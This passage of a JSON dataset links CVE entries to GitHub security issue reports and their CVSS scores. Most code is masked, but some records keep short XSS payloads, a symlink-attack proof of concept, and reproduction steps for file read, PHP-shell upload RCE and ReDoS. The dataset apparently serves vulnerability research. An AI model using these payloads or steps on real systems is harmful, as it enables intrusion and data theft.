  64098. "description": "Arbitrary file read & RCE vulnerability in APITAG . Description There is no filtering when downloading external images, which can cause arbitrary file reading and remote code execution. Impact Version lightcms latest version APITAG Steps to Reproduce Arbitrary File Reading FILETAG FILETAG Remote Code Execution Place the PHP file you want to be executed on your own server, and download it: FILETAG FILETAG",
  64099. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  64100. "severity": "CRITICAL",
  64101. "baseScore": 9.8,
  64102. "impactScore": 5.9,
  64103. "exploitabilityScore": 3.9
  64104. },
  64105. {
  64106. "CVE_ID": "CVE-2021-27116",
  64107. "Issue_Url_old": "https://github.com/beego/beego/issues/4484",
  64108. "Issue_Url_new": "https://github.com/beego/beego/issues/4484",
  64109. "Repo_new": "beego/beego",
  64110. "Issue_Created_At": "2021-02-07T09:28:17Z",
  64111. "description": "The /proc interface parameters of the admin service, the get cpuprof and get memprof commands, have a symlink attack vulnerability. Dear beego Team, I would like to report a security vulnerability in Beego's admin module. The vulnerable code is in profile.go: the APITAG and APITAG functions do not correctly check whether the file being created already exists (for example as a symlink), so a local attacker can launch symlink attacks. poc code: URLTAG func APITAG { file, err := APITAG APITAG if err != nil { ERRORTAG creating file: %s\", err) } _, err = APITAG logs for this process\")) if err != nil { APITAG } } $ ln s other/logs cpu APITAG $ go build symlink_attack.go $ ./symlink_attack $ cat other/logs My logs for this process $",
  64112. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
  64113. "severity": "HIGH",
  64114. "baseScore": 7.8,
  64115. "impactScore": 5.9,
  64116. "exploitabilityScore": 1.8
  64117. },
  64118. {
  64119. "CVE_ID": "CVE-2021-27186",
  64120. "Issue_Url_old": "https://github.com/fluent/fluent-bit/issues/3044",
  64121. "Issue_Url_new": "https://github.com/fluent/fluent-bit/issues/3044",
  64122. "Repo_new": "fluent/fluent-bit",
  64123. "Issue_Created_At": "2021-02-09T06:49:52Z",
  64124. "description": "NULL dereference on memory allocation error (src/ flb_avro). Bug Report Describe the bug NULL dereference (value returned by flb_malloc is not checked) after memory allocation error (flb_malloc is a wrapper around malloc that returns NULL on unsuccessful allocation). In most cases this issue will lead to a crash via segmentation fault. Vulnerable Code ERRORTAG To Reproduce Problem was identified by source code review. Expected behavior Memory allocation errors should be handled by checking the value returned by APITAG Your Environment Version used: Current \"master\" branch Additional context See following recommendations for details: URLTAG",
  64125. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  64126. "severity": "HIGH",
  64127. "baseScore": 7.5,
  64128. "impactScore": 3.6,
  64129. "exploitabilityScore": 3.9
  64130. },
  64131. {
  64132. "CVE_ID": "CVE-2021-27231",
  64133. "Issue_Url_old": "https://github.com/hestiacp/hestiacp/issues/1622",
  64134. "Issue_Url_new": "https://github.com/hestiacp/hestiacp/issues/1622",
  64135. "Repo_new": "hestiacp/hestiacp",
  64136. "Issue_Created_At": "2021-02-15T01:40:20Z",
  64137. "description": "FILETAG APITAG to DA feature request for further info: URLTAG For additional reference, here's an old thread from APITAG with NUMBERTAG possible solutions (mine being the worst of the NUMBERTAG URLTAG",
  64138. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N",
  64139. "severity": "MEDIUM",
  64140. "baseScore": 5.4,
  64141. "impactScore": 2.5,
  64142. "exploitabilityScore": 2.8
  64143. },
  64144. {
  64145. "CVE_ID": "CVE-2021-27293",
  64146. "Issue_Url_old": "https://github.com/restsharp/RestSharp/issues/1556",
  64147. "Issue_Url_new": "https://github.com/restsharp/restsharp/issues/1556",
  64148. "Repo_new": "restsharp/restsharp",
  64149. "Issue_Created_At": "2021-02-16T20:01:32Z",
  64150. "description": "Fix APITAG This advisory was emailed to the maintainer. Posting here as an issue as requested. Doyensec Vulnerability Advisory Regular Expression Denial of Service APITAG in APITAG Affected Product: APITAG APITAG released versions) Vendor: FILETAG Severity: Medium Vulnerability Class: Denial of Service Status: Open Author: Ben Caller ( FILETAG SUMMARY The .NET library APITAG uses a regular expression which is vulnerable to Regular Expression Denial of Service APITAG when converting strings into APITAG If a server responds with a malicious string, the client using APITAG will be stuck processing it for an exceedingly long time. This allows the remote server to trigger a Denial of Service. TECHNICAL DESCRIPTION The vulnerable regular expression is APITAG in APITAG : URLTAG It is used by the APITAG function when deserializing JSON responses into classes with APITAG properties. Due to the APITAG part containing nested repeats, this regular expression has catastrophic backtracking when processing a long string of digits. The behaviour occurs as long as the digits are not followed immediately by a closing parenthesis ')'. An example of a APITAG payload is APITAG . The space between 'new' and APITAG is required due to pre processing in APITAG : URLTAG The complexity is exponential: increasing the length of the malicious string of digits by one makes processing take about twice as long. On my laptop NUMBERTAG digits takes about NUMBERTAG seconds to process and NUMBERTAG digits takes about NUMBERTAG seconds, so a string with NUMBERTAG digits should take approximately NUMBERTAG years to process. The vulnerable regular expression was first introduced in commit URLTAG REPRODUCTION STEPS The APITAG can be triggered by calling APITAG directly, or by deserializing JSON responses into a class with a property of type APITAG . Example C code to see the effect of the APITAG is attached below. 
Changing the length of the string of zeroes will change the processing time. CODETAG REMEDIATION Fix APITAG . We propose simply removing the asterisk: APITAG . Doyensec APITAG is an independent security research and development company focused on vulnerability discovery and remediation. We work at the intersection of software development and offensive engineering to help companies craft secure code. Copyright NUMBERTAG by Doyensec LLC. All rights reserved. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given. The information in the advisory is believed to be accurate at the time of publishing based on currently available information, and it is provided as is, as a free service to the community by Doyensec LLC. There are no warranties with regard to this information, and Doyensec LLC does not accept any liability for any direct, indirect, or consequential loss or damage arising from use of, or reliance on, this information.",
  64151. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  64152. "severity": "HIGH",
  64153. "baseScore": 7.5,
  64154. "impactScore": 3.6,
  64155. "exploitabilityScore": 3.9
  64156. },
  64157. {
  64158. "CVE_ID": "CVE-2021-27308",
  64159. "Issue_Url_old": "https://github.com/4images/4images/issues/3",
  64160. "Issue_Url_new": "https://github.com/4images/4images/issues/3",
  64161. "Repo_new": "4images/4images",
  64162. "Issue_Created_At": "2021-02-13T12:30:30Z",
  64163. "description": "4images NUMBERTAG APITAG panel login' Cross Site Scripting. Vulnerable parameter : redirect XSS sample Payload : APITAG APITAG APITAG APITAG Steps to reproduce the vulnerability(POC NUMBERTAG Goto NUMBERTAG images admin panel page (demo APITAG URLTAG NUMBERTAG Enter the APITAG password=opensourcecms) , Turn on the intercept and click on APITAG NUMBERTAG copy paste the XSS payload after PATHTAG NUMBERTAG Forward the request and you can see XSS is triggered. Video POC : URLTAG Impact : With the help of xss attacker can perform social engineering on users by redirecting them from a real website to a fake ones. Attacker can steal their cookies leading to account takeover and download malware on their system, and there are many more attacking scenarios a skilled attacker can perform with XSS.",
  64164. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N",
  64165. "severity": "MEDIUM",
  64166. "baseScore": 4.8,
  64167. "impactScore": 2.7,
  64168. "exploitabilityScore": 1.7
  64169. },
  64170. {
  64171. "CVE_ID": "CVE-2021-27329",
  64172. "Issue_Url_old": "https://github.com/friendica/friendica/issues/9929",
  64173. "Issue_Url_new": "https://github.com/friendica/friendica/issues/9929",
  64174. "Repo_new": "friendica/friendica",
  64175. "Issue_Created_At": "2021-02-14T03:31:00Z",
  64176. "description": "External service interaction (HTTP & DNS). Hello Friendica Team. Issue detail I found a vulnerability issue while testing frendica locally. It is possible to induce the application to perform server side DNS lookups of arbitrary domain names and HTTP request. Bug Description The ability to send requests to other systems can allow the vulnerable server to be used as an attack proxy. By submitting suitable payloads, an attacker can cause the application server to attack other systems that it can interact with. This may include public third party systems, internal systems within the same organization, or services available on the local loopback adapter of the application server itself. Depending on the network architecture, this may expose highly vulnerable internal services that are not otherwise accessible to external attackers. Steps to Reproduce The request: CODETAG The response: CODETAG The DNS and HTTP request received: APITAG More details To make this request doesn't need to be authenticated, the friendica application accepts any request as an attachment and next do the DNS lookup and the HTTP request. Issue remediation You should review the purpose and intended use of the relevant application functionality, and determine whether the ability to trigger arbitrary external service interactions is intended behavior. If so, you should be aware of the types of attacks that can be performed via this behavior and take appropriate measures. These measures might include blocking network access from the application server to other internal systems, and hardening the application server itself to remove any services available on the local loopback adapter. If the ability to trigger arbitrary external service interactions is not intended behavior, then you should implement a whitelist of permitted services and hosts, and block any interactions that do not appear on this whitelist. 
References External service interaction (DNS) URLTAG FILETAG FILETAG Platform Info This is Friendica, version NUMBERTAG that is running at the web location localhost The database version is NUMBERTAG the post update version is NUMBERTAG APITAG APITAG APITAG mysql Ver NUMBERTAG Distrib NUMBERTAG APITAG for debian linux gnu NUMBERTAG using readline NUMBERTAG",
  64177. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H",
  64178. "severity": "CRITICAL",
  64179. "baseScore": 10.0,
  64180. "impactScore": 6.0,
  64181. "exploitabilityScore": 3.9
  64182. },
  64183. {
  64184. "CVE_ID": "CVE-2021-27343",
  64185. "Issue_Url_old": "https://github.com/SerenityOS/serenity/issues/5317",
  64186. "Issue_Url_new": "https://github.com/serenityos/serenity/issues/5317",
  64187. "Repo_new": "serenityos/serenity",
  64188. "Issue_Created_At": "2021-02-13T05:10:17Z",
  64189. "description": "APITAG Read buffer overflow in Crypto::der_decode_sequence. Found with APITAG File: FILETAG (with txt extension to allow uploading to GH) Trace: ERRORTAG",
  64190. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
  64191. "severity": "HIGH",
  64192. "baseScore": 7.5,
  64193. "impactScore": 3.6,
  64194. "exploitabilityScore": 3.9
  64195. },
  64196. {
  64197. "CVE_ID": "CVE-2021-27345",
  64198. "Issue_Url_old": "https://github.com/ckolivas/lrzip/issues/164",
  64199. "Issue_Url_new": "https://github.com/ckolivas/lrzip/issues/164",
  64200. "Repo_new": "ckolivas/lrzip",
  64201. "Issue_Created_At": "2020-09-02T08:51:40Z",
  64202. "description": "Segmentation fault caused by null pointer dereference during multithread processing in ucompthread, stream.c NUMBERTAG Hi, there. There is a segmentation fault caused by a null pointer dereference that caused a fatal error during the execution. Here is a brief explanation: APITAG This is the output during execution: ~~~~ Decompressing... Bad checksum NUMBERTAG b NUMBERTAG f NUMBERTAG expected NUMBERTAG c Fatal error exiting Segmentation fault ~~~~ To reproduce, run: ~~~~ lrzip t seg stream NUMBERTAG POC (unzip first): FILETAG Here is the trace reported by ASAN NUMBERTAG ERROR: APITAG SEGV on unknown address NUMBERTAG pc NUMBERTAG f8d8 bp NUMBERTAG cd NUMBERTAG sp NUMBERTAG f NUMBERTAG dafdd NUMBERTAG T NUMBERTAG f8d7 in ucompthread .. APITAG NUMBERTAG f NUMBERTAG fc6b9 in start_thread ( PATHTAG NUMBERTAG f NUMBERTAG d2e NUMBERTAG c in clone ( PATHTAG ) APITAG can not provide additional info. SUMMARY: APITAG SEGV .. APITAG ucompthread Thread T3 created by T0 here NUMBERTAG f NUMBERTAG e3 in pthread_create ( PATHTAG NUMBERTAG f3 in create_pthread .. APITAG NUMBERTAG f3 in fill_buffer .. APITAG NUMBERTAG f3 in read_stream .. APITAG NUMBERTAG ABORTING ~~~~",
  64203. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  64204. "severity": "MEDIUM",
  64205. "baseScore": 5.5,
  64206. "impactScore": 3.6,
  64207. "exploitabilityScore": 1.8
  64208. },
  64209. {
  64210. "CVE_ID": "CVE-2021-27347",
  64211. "Issue_Url_old": "https://github.com/ckolivas/lrzip/issues/165",
  64212. "Issue_Url_new": "https://github.com/ckolivas/lrzip/issues/165",
  64213. "Repo_new": "ckolivas/lrzip",
  64214. "Issue_Created_At": "2020-09-04T05:44:38Z",
  64215. "description": "Segmentation fault caused by use after free in multithread process from close_stream_in, stream NUMBERTAG to lzma_decompress_buf, stream NUMBERTAG Hi, there. I found a use-after-free issue in multithread processing in stream.c. The reason is that the buffer is unchecked during a multithread stream read. APITAG APITAG APITAG APITAG The high-level reason might be similar to issue NUMBERTAG but the program behavior/path is different. To reproduce, run ~~~~ lrzip t uaf stream NUMBERTAG lrz ~~~~ Since it is a problem in the multithread program, you might need to run this command multiple times to trigger. POC (unzip first): FILETAG Here is the output from the terminal: ~~~~ Decompressing... Bad checksum NUMBERTAG b NUMBERTAG f NUMBERTAG expected NUMBERTAG c Segmentation fault ~~~~ This is the trace reported by ASAN NUMBERTAG ERROR: APITAG heap use after free on address NUMBERTAG f0e0 at pc NUMBERTAG f8c bp NUMBERTAG ff7bdffdd NUMBERTAG sp NUMBERTAG ff7bdffdd NUMBERTAG Fatal error exiting WRITE of size NUMBERTAG at NUMBERTAG f0e0 thread T NUMBERTAG f8b in lzma_decompress_buf .. APITAG NUMBERTAG f8b in ucompthread .. APITAG NUMBERTAG ff7c1d NUMBERTAG b9 in start_thread ( PATHTAG NUMBERTAG ff7c NUMBERTAG c in clone ( PATHTAG NUMBERTAG f0e0 is located NUMBERTAG bytes inside of NUMBERTAG byte region APITAG freed by thread T0 here NUMBERTAG ff7c NUMBERTAG a in __interceptor_free ( PATHTAG NUMBERTAG a NUMBERTAG in close_stream_in .. APITAG previously allocated by thread T0 here NUMBERTAG ff7c NUMBERTAG fa in __interceptor_calloc ( PATHTAG NUMBERTAG c8f0 in open_stream_in .. APITAG Thread T3 created by T0 here NUMBERTAG ff7c NUMBERTAG ce1e3 in pthread_create ( PATHTAG NUMBERTAG f3 in create_pthread .. APITAG NUMBERTAG f3 in fill_buffer .. APITAG NUMBERTAG f3 in read_stream .. APITAG SUMMARY: APITAG heap use after free .. 
APITAG lzma_decompress_buf Shadow bytes around the buggy address NUMBERTAG c NUMBERTAG fff9dc0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c NUMBERTAG fff9dd0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c NUMBERTAG fff9de0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c NUMBERTAG fff9df0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c NUMBERTAG fff9e NUMBERTAG fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c NUMBERTAG fff9e NUMBERTAG fd fd fd fd fd fd fd fd fd fd fd fd[fd]fd fd fd NUMBERTAG c NUMBERTAG fff9e NUMBERTAG fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd NUMBERTAG c NUMBERTAG fff9e NUMBERTAG fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd NUMBERTAG c NUMBERTAG fff9e NUMBERTAG fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd NUMBERTAG c NUMBERTAG fff9e NUMBERTAG fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd NUMBERTAG c NUMBERTAG fff9e NUMBERTAG fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd Shadow byte legend (one shadow byte represents NUMBERTAG application bytes): Addressable NUMBERTAG Partially addressable NUMBERTAG Heap left redzone: fa Heap right redzone: fb Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack partial redzone: f4 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb APITAG internal: fe NUMBERTAG ABORTING ~~~~",
  64216. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  64217. "severity": "MEDIUM",
  64218. "baseScore": 5.5,
  64219. "impactScore": 3.6,
  64220. "exploitabilityScore": 1.8
  64221. },
  64222. {
  64223. "CVE_ID": "CVE-2021-27357",
  64224. "Issue_Url_old": "https://github.com/RIOT-OS/RIOT/issues/16018",
  64225. "Issue_Url_new": "https://github.com/riot-os/riot/issues/16018",
  64226. "Repo_new": "riot-os/riot",
  64227. "Issue_Created_At": "2021-02-16T09:16:42Z",
  64228. "description": "gnrc_rpl: Lack of bounds check for packed structs. Description RIOT's RPL implementation as provided by the APITAG module lacks proper bounds checks. RPL messages are encapsulated in ICMP NUMBERTAG datagrams. The message body of the ICMP NUMBERTAG datagram is extracted as follows: URLTAG The code above casts APITAG (i.e. the ICMP NUMBERTAG message body) to the appropriate RPL packed struct (e.g. APITAG ). However, it does not check whether the message is large enough to even contain a APITAG (or any other packed RPL struct). As such, the handlers in APITAG for specific RPL messages must check the len parameter before accessing any fields of these structs. The handler for APITAG messages, for example, directly passes the required information to the APITAG function; however, this function itself accesses fields of the struct before performing a length check to ensure that these fields are actually present. For example: URLTAG If the ICMP packet is too short this will result in an out of bounds read. Steps to reproduce the issue Use APITAG , activate APITAG and set APITAG to your netif (check with ifconfig in the shell provided by APITAG ) mine is APITAG : CODETAG Compile and run the application using: APITAG Afterwards run socat as: APITAG Expected results The application shouldn't crash. Actual results ERRORTAG",
  64229. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  64230. "severity": "CRITICAL",
  64231. "baseScore": 9.8,
  64232. "impactScore": 5.9,
  64233. "exploitabilityScore": 3.9
  64234. },
  64235. {
  64236. "CVE_ID": "CVE-2021-27368",
  64237. "Issue_Url_old": "https://github.com/monicahq/monica/issues/4888",
  64238. "Issue_Url_new": "https://github.com/monicahq/monica/issues/4888",
  64239. "Repo_new": "monicahq/monica",
  64240. "Issue_Created_At": "2021-02-18T10:29:23Z",
  64241. "description": "Security Issue XSS. Hi there, I'm using the latest version of Monica PRM web application NUMBERTAG deployed on my local Ubuntu machine. I would like to report to you the existence of a Cross-Site Scripting vulnerability in the Contact Page. The following fields of the Contact object can be used to host a stored XSS ( First name, Middle name, Last name, Nickname & Description ) and it will be triggered each time you browse the contact webpage or try to edit the details. This happens because of the way that FILETAG renders the webpage, executing the XSS payload in the vulnerable fields. the payload used in the POC: APITAG FILETAG To mitigate this issue different safeguards can be implemented, please refer to this website for more details: URLTAG Regards,",
  64242. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  64243. "severity": "MEDIUM",
  64244. "baseScore": 5.4,
  64245. "impactScore": 2.7,
  64246. "exploitabilityScore": 2.3
  64247. },
  64248. {
  64249. "CVE_ID": "CVE-2021-27513",
  64250. "Issue_Url_old": "https://github.com/EyesOfNetworkCommunity/eonweb/issues/87",
  64251. "Issue_Url_new": "https://github.com/eyesofnetworkcommunity/eonweb/issues/87",
  64252. "Repo_new": "eyesofnetworkcommunity/eonweb",
  64253. "Issue_Created_At": "2021-02-21T07:41:32Z",
  64254. "description": "Arbitrary file upload & RCE. Bonjour, En testant la version NUMBERTAG je me suis rendu compte qu'il \u00e9tait possible d'uploader n'importe quel type de file en bypassant le filtre userside dans le module admin_ITSM, j'ai pu ainsi uploader un shell PHP en le nommant FILETAG via interception et modification de la requ\u00eate. Une demande d'enregistrement MITRE a \u00e9t\u00e9 faite incluant le brute force de session_ID, ce qui donne un RCE non authentifi\u00e9 sur la version NUMBERTAG je sais que vous avez chiffr\u00e9 les sessions_ID en MD5 dans un commit pour la future version, j'ai bien peur que cela ne serve pas \u00e0 grand-chose, il suffit de chiffrer les sessions_ID \u00e9galement dans le brute force :( ). Je vous encourage \u00e0 inclure des modalit\u00e9s de s\u00e9curit\u00e9 dans le projet github ou une adresse de contact sur le site, parce que devoir mettre \u00e7a ici c'est un poil risky mais il n'y a pas vraiment le choix.",
  64255. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
  64256. "severity": "HIGH",
  64257. "baseScore": 8.8,
  64258. "impactScore": 5.9,
  64259. "exploitabilityScore": 2.8
  64260. },
  64261. {
  64262. "CVE_ID": "CVE-2021-27519",
  64263. "Issue_Url_old": "https://github.com/fudforum/FUDforum/issues/2",
  64264. "Issue_Url_new": "https://github.com/fudforum/fudforum/issues/2",
  64265. "Repo_new": "fudforum/fudforum",
  64266. "Issue_Created_At": "2021-02-17T07:30:23Z",
  64267. "description": "Cross Site Scripting. What is XSS Cross Site Scripting (XSS) attacks are a type of injection, in which malicious scripts are injected into otherwise benign and trusted websites. XSS attacks occur when an attacker uses a web application to send malicious code, generally in the form of a browser side script, to a different end user. Flaws that allow these attacks to succeed are quite widespread and occur anywhere a web application uses input from a user within the output it generates without validating or encoding it. Affected Version NUMBERTAG Demo installation: URLTAG > XSS NUMBERTAG Vulnerable parameter srch Vulnerable URL URLTAG PAYLOAD>&t=search Steps to reproduce the bug NUMBERTAG goto URLTAG NUMBERTAG In \"forum search\" option, paste XSS payload XSS payload: x\" onmouseover=alert NUMBERTAG Hover your mouse over \"x\" and XSS will get triggered Video POC : URLTAG > XSS NUMBERTAG Vulnerable parameter author Vulnerable URL URLTAG PAYLOAD> Steps to reproduce the bug NUMBERTAG goto URLTAG NUMBERTAG In the APITAG by User\" search option, paste XSS payload XSS payload: y\" onmouseover=alert NUMBERTAG y NUMBERTAG Hover your mouse over \"y\" and XSS will get triggered Video POC : URLTAG Impact of XSS : If an attacker can control a script that is executed in the victim's browser, then they can typically fully compromise that user. Amongst other things, the attacker can: Perform any action within the application that the user can perform. View any information that the user is able to view. Modify any information that the user is able to modify. Initiate interactions with other application users, including malicious attacks, that will appear to originate from the initial victim user. With the help of XSS a hacker or attacker can perform social engineering on users by redirecting them from a real website to a fake one. 
hacker can steal their cookies and download a malware on their system, and there are many more attacking scenarios a skilled attacker can perform with xss.",
  64268. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  64269. "severity": "MEDIUM",
  64270. "baseScore": 6.1,
  64271. "impactScore": 2.7,
  64272. "exploitabilityScore": 2.8
  64273. },
  64274. {
  64275. "CVE_ID": "CVE-2021-27522",
  64276. "Issue_Url_old": "https://github.com/WaterCountry/Learnsite/issues/1",
  64277. "Issue_Url_new": "https://github.com/watercountry/learnsite/issues/1",
  64278. "Repo_new": "watercountry/learnsite",
  64279. "Issue_Created_At": "2021-02-17T14:26:22Z",
  64280. "description": "there is.",
  64281. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
  64282. "severity": "HIGH",
  64283. "baseScore": 8.8,
  64284. "impactScore": 5.9,
  64285. "exploitabilityScore": 2.8
  64286. },
  64287. {
  64288. "CVE_ID": "CVE-2021-27568",
  64289. "Issue_Url_old": "https://github.com/netplex/json-smart-v2/issues/60",
  64290. "Issue_Url_new": "https://github.com/netplex/json-smart-v2/issues/60",
  64291. "Repo_new": "netplex/json-smart-v2",
  64292. "Issue_Created_At": "2021-02-22T21:44:52Z",
  64293. "description": "Uncaught Exception in Parser. The parser fails to throw the ERRORTAG when it expects the input to be of the float number type and the input is not a valid number. This can lead to uncaught exceptions on unexpected input, which may lead to Denial of Service APITAG URLTAG Parser Input of \" .\" or NUMBERTAG e+\" or NUMBERTAG e \" will crash with a ERRORTAG ERRORTAG",
  64294. "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H",
  64295. "severity": "MEDIUM",
  64296. "baseScore": 5.9,
  64297. "impactScore": 3.6,
  64298. "exploitabilityScore": 2.2
  64299. },
  64300. {
  64301. "CVE_ID": "CVE-2021-27568",
  64302. "Issue_Url_old": "https://github.com/netplex/json-smart-v1/issues/7",
  64303. "Issue_Url_new": "https://github.com/netplex/json-smart-v1/issues/7",
  64304. "Repo_new": "netplex/json-smart-v1",
  64305. "Issue_Created_At": "2021-02-22T21:10:21Z",
  64306. "description": "Uncaught Exception in Parser. The parser fails to throw the ERRORTAG when it expects the input to be of the float number type and the input is not a valid number. This can lead to uncaught exceptions on unexpected input, which may lead to Denial of Service APITAG URLTAG Parser Input of \" .\" or NUMBERTAG e+\" or NUMBERTAG e \" will crash with a ERRORTAG ERRORTAG",
  64307. "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H",
  64308. "severity": "MEDIUM",
  64309. "baseScore": 5.9,
  64310. "impactScore": 3.6,
  64311. "exploitabilityScore": 2.2
  64312. },
  64313. {
  64314. "CVE_ID": "CVE-2021-27568",
  64315. "Issue_Url_old": "https://github.com/netplex/json-smart-v2/issues/62",
  64316. "Issue_Url_new": "https://github.com/netplex/json-smart-v2/issues/62",
  64317. "Repo_new": "netplex/json-smart-v2",
  64318. "Issue_Created_At": "2021-03-05T03:16:52Z",
  64319. "description": "When will a new version be released to fix CVETAG ? hi, when will a new version be released to fix CVETAG ? Now, the latest version is NUMBERTAG in the maven repository. About CVETAG :An issue was discovered in netplex json smart NUMBERTAG through NUMBERTAG and json smart NUMBERTAG through NUMBERTAG An exception is thrown from a function, but it is not caught, as demonstrated by ERRORTAG When it is not caught, it may cause programs using the library to crash or expose sensitive information.",
  64320. "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H",
  64321. "severity": "MEDIUM",
  64322. "baseScore": 5.9,
  64323. "impactScore": 3.6,
  64324. "exploitabilityScore": 2.2
  64325. },
  64326. {
  64327. "CVE_ID": "CVE-2021-27677",
  64328. "Issue_Url_old": "https://github.com/sruupl/batflat/issues/105",
  64329. "Issue_Url_new": "https://github.com/sruupl/batflat/issues/105",
  64330. "Repo_new": "sruupl/batflat",
  64331. "Issue_Created_At": "2021-02-22T11:07:28Z",
  64332. "description": "Multiple Stored XSS Cross Site Scripting on Batflat CMS NUMBERTAG Multiple Stored XSS Cross Site Scripting on Batflat CMS NUMBERTAG Login with editor account with rights to Navigation, Galleries, Snippets APITAG APITAG ERRORTAG FILETAG Code being executed: FILETAG APITAG APITAG APITAG FILETAG Code being executed: FILETAG APITAG APITAG APITAG FILETAG Code being executed: FILETAG",
  64333. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  64334. "severity": "MEDIUM",
  64335. "baseScore": 5.4,
  64336. "impactScore": 2.7,
  64337. "exploitabilityScore": 2.3
  64338. },
  64339. {
  64340. "CVE_ID": "CVE-2021-27697",
  64341. "Issue_Url_old": "https://github.com/RIOT-OS/RIOT/issues/16062",
  64342. "Issue_Url_new": "https://github.com/riot-os/riot/issues/16062",
  64343. "Repo_new": "riot-os/riot",
  64344. "Issue_Created_At": "2021-02-22T13:54:17Z",
  64345. "description": "gnrc_rpl: missing bounds checks in gnrc_rpl_validation_options. Description The APITAG function has a problem very similar to the one described in NUMBERTAG It casts packed structs without performing a prior bounds check. For example, consider the handler for APITAG : URLTAG This is missing a check along the lines of: APITAG Otherwise, reading APITAG (or APITAG on the next iteration) may result in an out of bounds read: URLTAG Steps to reproduce the issue Use APITAG , activate APITAG and set APITAG to your netif (check with ifconfig in the shell provided by APITAG ) mine is APITAG : CODETAG Compile and run the application using: APITAG Afterwards run socat as: APITAG Expected results The application shouldn't crash. Actual results ERRORTAG CC: MENTIONTAG",
  64346. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  64347. "severity": "CRITICAL",
  64348. "baseScore": 9.8,
  64349. "impactScore": 5.9,
  64350. "exploitabilityScore": 3.9
  64351. },
  64352. {
  64353. "CVE_ID": "CVE-2021-27698",
  64354. "Issue_Url_old": "https://github.com/RIOT-OS/RIOT/issues/16085",
  64355. "Issue_Url_new": "https://github.com/riot-os/riot/issues/16085",
  64356. "Repo_new": "riot-os/riot",
  64357. "Issue_Created_At": "2021-02-24T12:39:46Z",
  64358. "description": "gnrc_rpl: missing bounds checks in _parse_options. Description The implementation of APITAG in APITAG has a problem very similar to the one described in NUMBERTAG for APITAG : It casts packed structs without performing prior boundary checks. I think the loop code is in fact more or less a copy of the one in APITAG , thus a fix very similar to NUMBERTAG will be needed for it too. Consider for example the following code: URLTAG In this case it might be the case that APITAG , however this case is not covered by the implementation currently. There are also other casts to packed structs in this function which have the same issue. Steps to reproduce the issue Use APITAG , activate APITAG and set APITAG to your netif (check with ifconfig in the shell provided by APITAG ) mine is APITAG : CODETAG I was also a bit too lazy to figure out how I can add an ULA to a APITAG network interface, to work around that just make sure APITAG uses the first interface for DODAGs with the following patch (if you know how please let me know): CODETAG Note: If you don't want to apply this patch, it should also be possible to reproduce this issue by adding a non local IP NUMBERTAG address to your network interface and passing that address to the rpl root command below. Compile and run the application using: APITAG In the RIOT term initialize the RPL root instance with (the address passed to rpl root doesn't matter due to the patch from above): APITAG Afterwards run socat as: APITAG Expected results The application shouldn't crash. Actual results ERRORTAG CC: MENTIONTAG",
  64359. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  64360. "severity": "CRITICAL",
  64361. "baseScore": 9.8,
  64362. "impactScore": 5.9,
  64363. "exploitabilityScore": 3.9
  64364. },
  64365. {
  64366. "CVE_ID": "CVE-2021-27811",
  64367. "Issue_Url_old": "https://github.com/whiskey-jj/w2s2x2222.github.io/issues/2",
  64368. "Issue_Url_new": "https://github.com/whiskey-jj/w2s2x2222.github.io/issues/2",
  64369. "Repo_new": "whiskey-jj/w2s2x2222.github.io",
  64370. "Issue_Created_At": "2021-02-25T04:15:57Z",
